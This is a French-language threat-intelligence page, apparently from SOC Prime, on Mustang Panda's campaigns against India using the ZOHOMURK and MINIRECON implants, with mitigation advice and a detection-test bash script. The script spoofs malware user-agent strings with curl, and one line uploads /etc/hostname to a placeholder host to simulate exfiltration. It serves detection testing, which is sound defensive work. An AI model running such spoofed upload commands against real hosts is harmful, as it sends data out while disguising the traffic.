SOC Prime Bias: Élevé

06 Jul 2026 21:57 UTC

Mustang Panda utilise ZOHOMURK et MINIRECON contre les secteurs gouvernementaux et énergétiques de l’Inde

Author Photo
SOC Prime Team linkedin icon Suivre
Mustang Panda utilise ZOHOMURK et MINIRECON contre les secteurs gouvernementaux et énergétiques de l’Inde
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Résumé

Mustang Panda mène des opérations d’espionnage ciblant le gouvernement indien et les secteurs de l’hydroélectricité. Le groupe utilise un ensemble d’outils malveillants mis à jour incluant SHARDLOADER, MINIRECON et ZOHOMURK. L’une de ses techniques notables est l’abus de Zoho WorkDrive pour le commandement et le contrôle ainsi que l’exfiltration de données.

Investigation

Acronis TRU a identifié deux campagnes parallèles qui utilisaient des appâts de spear-phishing autour de la coopération Inde-Taïwan. Les chercheurs ont découvert le chargement de DLL via les binaires légitimes de Solid PDF Creator et ont analysé les nouveaux implants ZOHOMURK et MINIRECON. L’enquête a également été menée en coordination avec CERT-In pour soutenir les actions défensives.

Atténuation

Les organisations devraient surveiller les activités inhabituelles impliquant les plateformes cloud, en particulier l’utilisation non autorisée de Zoho WorkDrive. Les solutions EDR et XDR devraient être configurées pour détecter le chargement de DLL et la persistance suspecte basée sur le registre. Il est également essentiel d’avoir une visibilité sur les processus non-navigateurs établissant des connexions HTTPS ou WebSocket vers des services cloud.

Réponse

Si cette activité est détectée, les systèmes affectés doivent être isolés immédiatement pour stopper toute exfiltration supplémentaire via les API cloud. Les enquêteurs devraient réaliser une analyse forensic sur les chemins de staging tels que C:ProgramDataIDMlogs or %LOCALAPPDATA%MicrosoftVaultCache. Les clés Run du registre et les tâches planifiées doivent également être examinées pour une persistance non autorisée.

Flux d’Attaque

Exécution de simulation

Prérequis : La vérification préliminaire de télémétrie et de ligne de base doit avoir réussi.

Raisonnement : Cette section détaille l’exécution précise de la technique de l’adversaire (TTP) conçue pour déclencher la règle de détection. Les commandes et le récit doivent refléter directement les TTPs identifiés et viser à générer la télémétrie exacte attendue par la logique de détection. Des exemples abstraits ou non liés conduiront à un mauvais diagnostic.

  • Narration et commandes de l’attaque : L’adversaire a réussi à établir un point d’ancrage et tente d’initier des communications de commande et de contrôle (C2). Pour se faire passer pour du trafic commercial légitime, l’implant ZOHOMURK essaie de communiquer avec son contrôleur en imitant les appels API de Zoho WorkDrive. L’attaquant utilise une chaîne User-Agent spécifique et codée en dur (Zoho Client/1.0) pour passer à travers certains filtres réseau, espérant se fondre dans le trafic de productivité cloud légitime. Cette action générera une entrée de journal de proxy contenant le User-Agent cible, déclenchant ainsi la règle de détection.

  • Script de test de régression :

    #!/bin/bash
    # Simulation de C2 ZOHOMURK via falsification de User-Agent
    # Cible 1 : Imitation de Zoho Client
    echo "[+] Simulation ZOHOMURK : Zoho Client/1.0"
    curl -A "Zoho Client/1.0" http://example.com/api/v1/sync
    
    # Cible 2 : Imitation de IPFetcher
    echo "[+] Simulation ZOHOMURK : IPFetcher/1.0"
    curl -A "IPFetcher/1.0" http://example.com/checkip
    
    # Cible 3 : Imitation de Multipart POST User-Agent
    echo "[+] Simulation ZOHOMURK : Multipart POST"
    curl -X POST -A "Multipart POST" -F "data=@/etc/hostname" http://example.com/upload
  • Commandes de nettoyage :

    # Aucun artefact persistant n'est créé sur le système par cette simulation basée sur le réseau.
    # Assurez-vous simplement qu'aucun processus curl en arrière-plan ne soit en cours.
    pkill curl